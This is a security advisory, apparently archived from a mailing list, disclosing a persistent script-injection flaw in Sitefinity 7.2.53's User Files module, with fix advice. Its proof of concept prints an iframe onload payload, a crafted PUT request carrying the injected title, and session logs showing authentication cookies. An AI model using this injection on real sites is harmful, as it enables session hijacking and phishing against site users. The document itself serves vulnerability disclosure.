[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Sitefinity Enterprise v7.2.53 - Persistent Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx
- Subject: Sitefinity Enterprise v7.2.53 - Persistent Vulnerability
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Tue, 13 Jan 2015 18:29:31 +0100
Document Title:
===============
Sitefinity Enterprise v7.2.53 - Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1369
Release Date:
=============
2015-01-06
Vulnerability Laboratory ID (VL-ID):
====================================
1369
Common Vulnerability Scoring System:
====================================
3.7
Product & Service Introduction:
===============================
Usability that Empowers the Business. Empower your business users to get their
job done independently and effectively. Powerful Drag & Drop
Authoring, on-page editing and contextual guidance for self-servicing marketing
teams. Complete Feature set to create content experiences,
run campaigns and deliver results. Rated #1 in Ease of Use in the Gleanster
2014 WCM Benchmarks. Personalization, content targeting, persona
profiling and segmentation that your team can immediately start using.
Integrated Digital Experience Cloud that includes Customer Journey
Analysis, Predictive and Prescriptive Analytics for optimizing every customer
experiences. Built-in ecommerce, email marketing, landing page
management and cross-channel delivery tools.
(Copy of the Vendor Homepage: http://www.sitefinity.com/product/overview )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input
validation vulnerability in the official Telerik Sitefinity v7.2.53 Enterprise
Edition CMS.
Vulnerability Disclosure Timeline:
==================================
2015-01-06: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Telerik
Product: Sitefinity Enterprise Edition - Content Managemtn System 7.2.53
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side validation vulnerability has been discovered in the
official Telerik Sitefinity v7.2.53 Enterprise Edition CMS.
The vulnerability allows an attacker to inject own script code as payload to
the application-side of the vulnerable service function or module.
The vulnerability is located in the `sfItemTitle` and
`sf_binderCommand_viewItemsByParent` values of the vulnerable `User Files >
Properties` module.
Attackers are able to send special crafted PUT requests with manipulated
`sfItemTitle` to the service application to compromise the `./user-files`
module.
The execution of the injected script code occurs on the application of the
user-files listing module by the manipulated name context field. The attack
vector is persistent on the application-side and the request method to inject
is PUT.
The security risk of the application-side web vulnerability is estimated as
medium with a cvss (common vulnerability scoring system) count of 3.7.
Exploitation of the application-side web vulnerability requires a privileged
web-application user account and low or medium user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing
mails, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module
context.
Request Method(s):
[+] PUT
Vulnerable Module(s):
[+] Settings & Configuration > User
Files > Properties
Vulnerable Parameter(s):
[+] sfItemTitle
[+] sf_binderCommand_viewItemsByParent
Affected Module(s):
[+] User File listing & Upload Files
(./Administration/User-files)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote
attackers and local privileged application user accounts with low user
interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Input: Settings & Configuration > User Files
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Administration/User-files#event=showWindow&winId=ctl04_userFilesBackendList_ctl00_ctl00_itemsGrid_ctl00_ctl00_edit&autoMax=false
Execution: User File listing & Upload Files
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Administration/User-files
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Administration/User-files#event=showWindow&winId=ctl04_userFilesBackendList_ctl00_ctl00_itemsGrid_ctl00_ctl00_upload&autoMax=false
PoC: ./User-files
</div></td>
</tr>
</tfoot><tbody>
<tr style="visibility: visible; display: table-row;" class="rgRow"
id="ctl04_userFilesBackendList_ctl00_ctl00_itemsGrid_ctl00_ctl00_grid_ctl00__0">
<td class="sfCheckBoxCol"><input
id="ctl04_userFilesBackendList_ctl00_ctl00_itemsGrid_ctl00_ctl00_grid_ctl00_ctl04_ClientSelectColumnSelectCheckBox"
name="ctl04$userFilesBackendList$ctl00$ctl00$itemsGrid$ctl00$ctl00$grid$ctl00$ctl04$ClientSelectColumnSelectCheckBox"
type="checkbox"></td><td class="sfFolderIcn">
<div class="sys-container">
<p><a href="" class="sf_binderCommand_viewItemsByParent">"><[PERSISTENT SCRIPT
CODE EXECUTION!];)" <="" "=""><iframe src=a onload=alert("PENTEST") <</a></p>
</iframe></a></p></div>
</td><td class="sfAlbumInfo">
<div class="sys-container"><a href="" class="sf_binderCommand_viewItemsByParent
sfItemTitle">"><[PERSISTENT SCRIPT CODE EXECUTION!]") <</a><p>0 items</p><p></p>
</iframe></a></div>
</td><td class="sfActionsWithProgress">
<div class="sys-container">
<div class="cmDiv"><ul class="actionsMenu
clickMenu" id="actions0">
<li class="main sfFirst"><a href="" class="sf_binderCommand_upload">Upload
files</a></li>
<li class="main sfLast">
<a menu="actions0" href="">Actions</a>
<div style="position: absolute;" class="outerbox inner"><div
class="shadowbox1"></div><div class="shadowbox2"></div><div
class="shadowbox3"></div><ul class="innerBox">
<li>
<a href="" class="sf_binderCommand_edit">Edit Properties</a>
</li>
<li>
<a href="" class="sf_binderCommand_permissions">Set
Permissions</a>
</li>
<li>
<a href="" class="sf_binderCommand_relocateLibrary">Change
library URL</a>
</li>
<li>
<a href="" class="sf_binderCommand_transferLibrary">Move to
another storage</a>
</li>
</ul></div>
--- PoC Session Logs [PUT] (Sandbox) ---
Status: 200[OK]
PUT
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Services/Content/DocumentLibraryService.svc/00000000-0000-0000-0000-000000000000/?
itemType=Telerik.Sitefinity.Libraries.Model.DocumentLibrary&providerName=SystemLibrariesProvider&managerType=&provider=SystemLibrariesProvider&workflowOperation=
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[1942] Mime Type
[application/json]
Request Header:
Host[site16408192010623.srv03.sandbox.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0]
Accept[text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Content-Type[application/json; charset=UTF-8]
Referer
[http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Dialog/ContentViewEditDialog?ControlDefinitionName=UserFilesBackend&ViewName=UserFilesBackendEditView&language=en&provider=SystemLibrariesProvider]
Content-Length[1580]
Cookie[__utma=172034556.525088814.1417720592.1417720592.1417720592.1;
__utmb=172034556.15.9.1417720879538; __utmc=172034556;
__utmz=172034556.1417720592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=
%7B%22231657604%22%3A%22direct%22%2C%22232100060%22%3A%22ff%22%2C%22231586836%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1417720591980r0.28011022211653314;
optimizelyBuckets=%7B%7D; __CT_Data=gpv=8&apv_43014_www=8; WRUID=0;
_mkto_trk=id:194-TGP-611&token:_mch-localhost:8080-1417720595883-55422;
tlrksf=aGXixH2bBlrRA97hnWN5sFB0%2BvJxHVuu2qnpZkS9RYv%2F87XYIvNh2N%2Fjuwd0kGsFVvqywF1
a3aM3f5iJNpiJkTIo674vbDXIM%2F4%2B7yk9V2byjPPieLbTLbWijZZqwdoCpgmrkgndB8G2vB
%2FzMHYy1Q%3D%3D; sf-data-intell-subject=42072ebe-ef56-4c95-bb3c-a8a2634661f4;
.ASPXAUTH=95B673ED661D659CFA2B105E95D5ECFB2F4FCC1399E5699CFEC062B2D399DC752C6205E6B8DB4CA93DBB4C2E5FB23AEF8B3ECD51588FD8111F6E69453C609E399B69000
BF2884D1435BCB937BB6EC5667F3943A804FE36A87AE9295EC2DBA53B605E5E37BD22E6DDB9B521C33687AFCBE4
8E1DB3BCEC875E4061DCBE6F6524B60F1E52007F92C955FA5DDE19A91E1A72CFC9D50B9F473FD3882D5F777906C8959977DBAEB24F80D4BAA0CD052B1973A4;
SF-TokenId=6e637324-9c93-42b7-ab60-51367d11133e;
FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4...
lnYXpDTjdsdE5Kckc5aFZ3TS9uZ0lrZ1VOSWNvQU5QY1YyVEJQeUR4UGt2VTRWTHllSHJjNTdSMW9LcXZOMHhPV05
oakpHbTM5Q2JQVzlnMkFOZC9VSit2dk1UZU5uQlhIMG1uNGttVVp2QjF2OEo4cHhSTTZqWlVNYmNuTGFrN2dITU95NjVpMjhnc1pBREFBQT08L0Nvb2tpZT48L1NlY3VyaXR5Q29udGV4dFRva2VuPg==;
sf_site=34c08ad3-81d1-4b36-82b5-4610ef8204bc]
Connection[keep-alive]
POST-Daten:
{"Item":{"AllowComments":true,"AllowTrackBacks":null,"ApproveComments":false,"AvailableLanguages":["","en"],
"BlobStorageProvider":"Database","ClientCacheDuration":0,"ClientCacheProfile":"","DateCreated":"\/Date
(1362640264770)\/","DefaultPageId":null,"Description":{"PersistedValue":"","Value":""},"DownloadSecurityProviderName":null,
"EmailAuthor":false,"EnableClientCache":false,"EnableOutputCache":false,"ExpirationDate":null,"Id":"7551e10d-
515d-67af-8bab-ff0100a58543","IncludeInSitemap":false,"ItemDefaultUrl":{"PersistedValue":"/form-files-sf_jobapplication",
"Value":"/form-files-sf_jobapplication"},"LastModifiedBy":"00000000-0000-0000-0000-
000000000000","MaxItemSize":"0","MaxSize":"0","OriginalContentId":"00000000-0000-0000-0000-000000000000","OutputCacheDuration":0,"OutputCacheMaxSize":0,
"OutputCacheProfile":null,"OutputSlidingExpiration":false,"Owner":"268f8745-3b5f-
425f-a206-3731adacea20","ParentId":null,"PostRights":1,"PublicationDate":"\/Date(1362640264640)\/","RunningTask":"00000000-0000-0000-0000-000000000000",
"Status":0,"ThumbnailProfiles":[],"Title":{"PersistedValue":"\"><[PERSISTENT
SCRIPT CODE INJECTION VULNERABILITY!]") <","Value":"asdasdasd"},"UIStatus":0,
"UrlName":{"PersistedValue":"form-files-sf_jobapplication","Value":"form-files-
sf_jobapplication"},"UseDefaultSettingsForClientCaching":false,"UseDefaultSettingsForOutputCaching":false,"Version":0,"ViewsCount":0,
"Visible":false,"VotesCount":0,"VotesSum":0,"LastModified":"\/Date
(1417721995648)\/"},"ItemType":"Telerik.Sitefinity.Libraries.Model.DocumentLibrary"}]
Response Header:
Cache-Control[private]
Pragma[no-cache]
Content-Length[1942]
Content-Type[application/json; charset=utf-8]
Expires[0]
Server[Microsoft-IIS/8.5]
Set-Cookie
[FedAuth=77u/PD94bWw... R5Q29udGV4dFRva2VuPg==; path=/; HttpOnly]
X-AspNet-Version[4.0.30319]
X-Powered-By[ASP.NET]
Date[Thu, 04 Dec 2014 19:40:07 GMT]
-
Status: 200[OK]
GET
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Services/Content/DocumentLibraryService.svc/?
managerType=&providerName=&itemType=Telerik.Sitefinity.Libraries.Model.DocumentLibrary&provider=SystemLibrariesProvider&sortExpression=LastModified%20DESC&skip=0&take=50
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[5598] Mime Type
[application/json]
Request Header:
Host[site16408192010623.srv03.sandbox.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0]
Accept[text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
SF_UI_CULTURE[en]
Referer
[http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Administration/User-files]
Cookie[__utma=172034556.525088814.1417720592.1417720592.1417720592.1;
__utmb=172034556.15.9.1417720879538; __utmc=172034556;
__utmz=172034556.1417720592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22231657604%22%3A%22direct%22%2C%22232100060%22%3A%22ff%22%2C%22231586836%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1417720591980r0.28011022211653314;
optimizelyBuckets=%7B%7D; __CT_Data=gpv=8&apv_43014_www=8; WRUID=0;
_mkto_trk=id:194-TGP-611&token:_mch-localhost:8080-1417720595883-55422;
tlrksf=aGXixH2bBlrRA97hnWN5sFB0%2BvJxHVuu2qnpZkS9RYv%2F87XYIvNh2N%2Fjuwd0kGsFVvqywF1a3aM3f5iJNpiJkTIo674vbDXIM%2F4%2B7yk9V2byjPPieLbTLbWijZZqwdoCpgmrkgndB8G2vB%2FzMHYy1Q%3D%3D;
sf-data-intell-subject=42072ebe-ef56-4c95-bb3c-a8a2634661f4;
.ASPXAUTH=95B673ED66...a2VuPg==; path=/; HttpOnly]
X-AspNet-Version[4.0.30319]
X-Powered-By[ASP.NET]
Date[Thu, 04 Dec 2014 19:40:07 GMT]
-
Status: 200[OK]
GET
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Administration/[PERSISTENT
SCRIPT CODE EXECUTION!]
Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[1245] Mime Type[text/html]
Request Header:
Host[site16408192010623.srv03.sandbox.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Administration/User-files]
Cookie[__utma=172034556.525088814.1417720592.1417720592.1417720592.1;
__utmb=172034556.15.9.1417720879538; __utmc=172034556;
__utmz=172034556.1417720592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B
%22231657604%22%3A%22direct%22%2C%22232100060%22%3A%22ff%22%2C%22231586836%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1417720591980r0.28011022211653314;
optimizelyBuckets=%7B%7D; __CT_Data=gpv=8&apv_43014_www=8; WRUID=0;
_mkto_trk=id:194-TGP-611&token:_mch-localhost:8080-1417720595883-55422;
tlrksf=aGXixH2bBlrRA97hnWN5sFB0%2BvJxHVuu2qnpZkS9RYv%2
F87XYIvNh2N%2Fjuwd0kGsFVvqywF1a3aM3f5iJNpiJkTIo674vbDXIM%2F4%2B7yk9V2byjPPieLbTLbWijZZqwdoCpgmrkgndB8G2vB
%2FzMHYy1Q%3D%3D; sf-data-intell-subject=42072ebe-ef56-4c95-bb3c-a8a2634661f4;
.ASPXAUTH=95B673ED661...dFRva2VuPg==; path=/; HttpOnly]
X-Powered-By[ASP.NET]
Date[Thu, 04 Dec 2014 19:40:08 GMT]
Content-Length[1245]
Reference(s):
http://site16408192010623.srv03.sandbox.localhost:8080/
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Administration/
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Services/Content/DocumentLibraryService.svc
http://site16408192010623.srv03.sandbox.localhost:8080/Sitefinity/Services/Content/DocumentLibraryService.svc/00000000-0000-0000-0000-000000000000/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction of the vulnerable name
input field. Disallow special chars.
Encode and parse the input that runs through the sfItemTitle and
sf_binderCommand_viewItemsByParent value to prevent persistent script code
executions.
Encode the user-files output listing index module with the vulnerable name
value to ensure script code execution is blocked.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the
backend interface is estimated as medium. (CVSS 3.7)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen
material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx -
research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: magazine.vulnerability-db.com -
vulnerability-lab.com/contact.php -
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All
other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To
record, list (feed), modify, use or edit our material contact
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a
permission.
Copyright © 2015 | Vulnerability Laboratory -
[Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
PGP KEY:
http://www.vulnerability-lab.com/keys/admin@xxxxxxxxxxxxxxxxxxxxx%280x198E9928%29.txt